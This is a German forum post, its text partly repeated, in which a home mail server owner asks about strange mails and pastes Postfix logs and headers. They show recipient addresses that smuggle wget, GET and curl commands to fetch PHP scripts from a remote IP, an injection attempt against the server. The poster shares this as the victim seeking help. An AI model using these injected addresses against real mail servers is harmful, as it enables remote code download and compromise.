Hallo Leute!
Ich habe seit einigen Tagen meinen Mailserver in Betrieb, funktioniert soweit sehr gut.
Auch habe ich das erweiterte Logging wie hier im Forum beschrieben eingerichtet und prüfe täglich die Logs, weil ich anfangs natürlich genau wissen will, was am Server so gespielt wird. Neben vielen Spams auf geblockte Adressen und gescheiterten Login Versuchen mit den üblichen Benutzern wie root, admin etc. ist mir heute etwas seltsames aufgefallen.
Vorweg, ich bin weit davon entfernt ein Mailprofi zu sein, deshalb verstehe ich das nicht wirklich, was da passiert ist. Vielleicht noch zur Info, ich mache auf meine Domain ein catch-all wobei ich in einer Blacklist eine Gruppe von ca. 20 Mailadressen habe, auf die ich ein reject ausführe.
Normalerweise kommen Spam Mails auf Adressen, mit denen ich mich irgendwo registriert habe. Diesmal allerdings kamen mehrere Mails auf ein Konto, mit dem ich sicher nirgends registriert bin. Das Ungewöhnliche daran, es entspricht genau meinem Kontonamen, an den ich alle mit catch-all eingefangenen Mails weitergebe.
Ich habe zwar beim Einrichten des Mailservers einige Testmails vom Account meines Internet Providers direkt an diesen Account geschickt, aber das war's. Die reject Mails habe ich geprüft, in denen scheint keinerlei Info über den Account Namen im Mailbody auf.
Außerdem rufe ich per Handy immer wieder Mails von meinem Mailserver ab, wobei ich natürlich als Benutzer Login diesen Namen angebe.
Aber hey, bei meinem ISP oder beim externen Abrufen von Mails per Handy die Schwachstelle zu suchen finde ich doch etwas weit hergeholt.
An meinem Router habe ich die Ports 25, 110, 993 und 995 auf den Server geforwareded. Webmail ist für außen nicht freigeschaltet.
Daher meine Frage an alle, die ein wenig mehr Ahnung von dem Zeug haben als ich, was glaubt ihr woher das kommt?
Hier noch ein paar Logeinträge - meine IP kommt hier nirgends vor, meinen Kontonamen habe ich wie meine domain anonymisiert. Hier scheint es, als ob über diese seltsamen Mails ein paar Schädlings PHP Scripts mit Hilfe des User root runtergeladen werden sollten:
Nebenbei, ich habe auch noch sämtliche Logs seit Inbetriebnahme aufbewahrt.
Natürlich will ich euch die Mails, die ich auf diesen Account bekommen habe nicht vorenthalten, zumind. mal eines davon. Der Rest sieht eigentlich gleich aus bis auf den busy-1, das wechselt:
Ich habe seit einigen Tagen meinen Mailserver in Betrieb, funktioniert soweit sehr gut.
Auch habe ich das erweiterte Logging wie hier im Forum beschrieben eingerichtet und prüfe täglich die Logs, weil ich anfangs natürlich genau wissen will, was am Server so gespielt wird. Neben vielen Spams auf geblockte Adressen und gescheiterten Login Versuchen mit den üblichen Benutzern wie root, admin etc. ist mir heute etwas seltsames aufgefallen.
Vorweg, ich bin weit davon entfernt ein Mailprofi zu sein, deshalb verstehe ich das nicht wirklich, was da passiert ist. Vielleicht noch zur Info, ich mache auf meine Domain ein catch-all wobei ich in einer Blacklist eine Gruppe von ca. 20 Mailadressen habe, auf die ich ein reject ausführe.
Normalerweise kommen Spam Mails auf Adressen, mit denen ich mich irgendwo registriert habe. Diesmal allerdings kamen mehrere Mails auf ein Konto, mit dem ich sicher nirgends registriert bin. Das Ungewöhnliche daran, es entspricht genau meinem Kontonamen, an den ich alle mit catch-all eingefangenen Mails weitergebe.
Ich habe zwar beim Einrichten des Mailservers einige Testmails vom Account meines Internet Providers direkt an diesen Account geschickt, aber das war's. Die reject Mails habe ich geprüft, in denen scheint keinerlei Info über den Account Namen im Mailbody auf.
Außerdem rufe ich per Handy immer wieder Mails von meinem Mailserver ab, wobei ich natürlich als Benutzer Login diesen Namen angebe.
Aber hey, bei meinem ISP oder beim externen Abrufen von Mails per Handy die Schwachstelle zu suchen finde ich doch etwas weit hergeholt.
An meinem Router habe ich die Ports 25, 110, 993 und 995 auf den Server geforwareded. Webmail ist für außen nicht freigeschaltet.
Daher meine Frage an alle, die ein wenig mehr Ahnung von dem Zeug haben als ich, was glaubt ihr woher das kommt?
Hier noch ein paar Logeinträge - meine IP kommt hier nirgends vor, meinen Kontonamen habe ich wie meine domain anonymisiert. Hier scheint es, als ob über diese seltsamen Mails ein paar Schädlings PHP Scripts mit Hilfe des User root runtergeladen werden sollten:
Rich (BBCode):
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: connect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: connect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: 9FB3E18B3A6: client=mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: 9FB3E18B3A6: client=mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/cleanup[3703]: 9FB3E18B3A6: message-id=<20100315043747.9FB3E18B3A6@mydomain>
Mar 15 05:37:47 MailStation postfix/cleanup[3703]: 9FB3E18B3A6: message-id=<20100315043747.9FB3E18B3A6@mydomain>
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: from=<blue@dick.com>, size=295, nrcpt=3 (queue active)
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: from=<blue@dick.com>, size=295, nrcpt=3 (queue active)
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: disconnect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: disconnect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|wget http://61.100.185.177/busy-1.php>, relay=local, delay=0.38, delays=0.25/0.12/0/0.02, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|wget http://61.100.185.177/busy-1.php>, relay=local, delay=0.38, delays=0.25/0.12/0/0.02, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|GET http://61.100.185.177/busy-2.php>, relay=local, delay=0.4, delays=0.25/0.13/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|GET http://61.100.185.177/busy-2.php>, relay=local, delay=0.4, delays=0.25/0.13/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|curl http://61.100.185.177/busy-3.php>, relay=local, delay=0.41, delays=0.25/0.15/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|curl http://61.100.185.177/busy-3.php>, relay=local, delay=0.41, delays=0.25/0.15/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: removed
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: removed
Nebenbei, ich habe auch noch sämtliche Logs seit Inbetriebnahme aufbewahrt.
Natürlich will ich euch die Mails, die ich auf diesen Account bekommen habe nicht vorenthalten, zumind. mal eines davon. Der Rest sieht eigentlich gleich aus bis auf den busy-1, das wechselt:
Rich (BBCode):
Return-Path: <blue@dick.com>
X-Original-To: "root+:|wget http://61.100.185.177/busy-1.php"
Delivered-To: account@mydomain
Received: from bluedick (mail.modaintl.com [68.236.170.186])
by mydomain (Postfix) with SMTP id C9B3E18B3A6;
Mon, 15 Mar 2010 19:53:35 +0100 (CET)
Message-Id: <20100315185340.C9B3E18B3A6@mydomain>
Date: Mon, 15 Mar 2010 19:53:35 +0100 (CET)
From: blue@dick.com
To: undisclosed-recipients:;